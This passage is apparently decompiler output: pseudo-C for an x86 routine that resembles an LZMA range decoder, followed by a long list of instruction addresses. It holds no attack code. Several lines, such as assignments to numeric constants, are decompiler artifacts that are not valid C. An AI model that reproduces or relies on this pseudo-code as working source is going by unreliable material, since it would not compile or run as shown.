											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406481
0x00406481
0x00406481
0x00406481
0x00406487
0x0040648b
0x0040648f
0x00406499
0x004064a7
0x0040677d
0x0040677d
0x00406780
0x00406787
0x004067b4
0x004067b4
0x004067b8
0x00000000
0x00000000
0x004067ba
0x004067c3
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067db
0x004067f4
0x004067f7
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067ec
0x004067ef
0x004067ef
0x00406811
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b8
0x00000000
0x00000000
0x00000000
0x00406813
0x00406813
0x0040678c
0x00406790
0x004068c8
0x004068c8
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406796
0x0040679c
0x004067a3
0x004067ab
0x004067ab
0x004067ae
0x00000000
0x004067ae
0x00406818
0x00406825
0x00406828
0x00406734
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00405edf
0x00000000
0x00405ee6
0x00405eea
0x00000000
0x00000000
0x00405ef0
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4b
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x0040683b
0x00000000
0x0040683b
0x00405f95
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fbf
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x0040684a
0x00000000
0x0040684a
0x00406005
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068bc
0x00000000
0x004068bc
0x00406713
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00000000
0x0040604c
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062eb
0x004062ef
0x0040630d
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406414
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406682
0x00406686
0x004066a8
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406688
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x0040677d
0x00406780
0x00406787
0x00000000
0x0040678a
0x00406745
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406830
0x00406833
0x00406734
0x00406734
0x00406734
0x00000000
0x0040673a
0x00000000
0x0040646a
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x0040678a
0x00000000
0x00000000
0x00000000
0x004064af
0x004064af
0x004064b2
0x004064e8
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x00406548
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
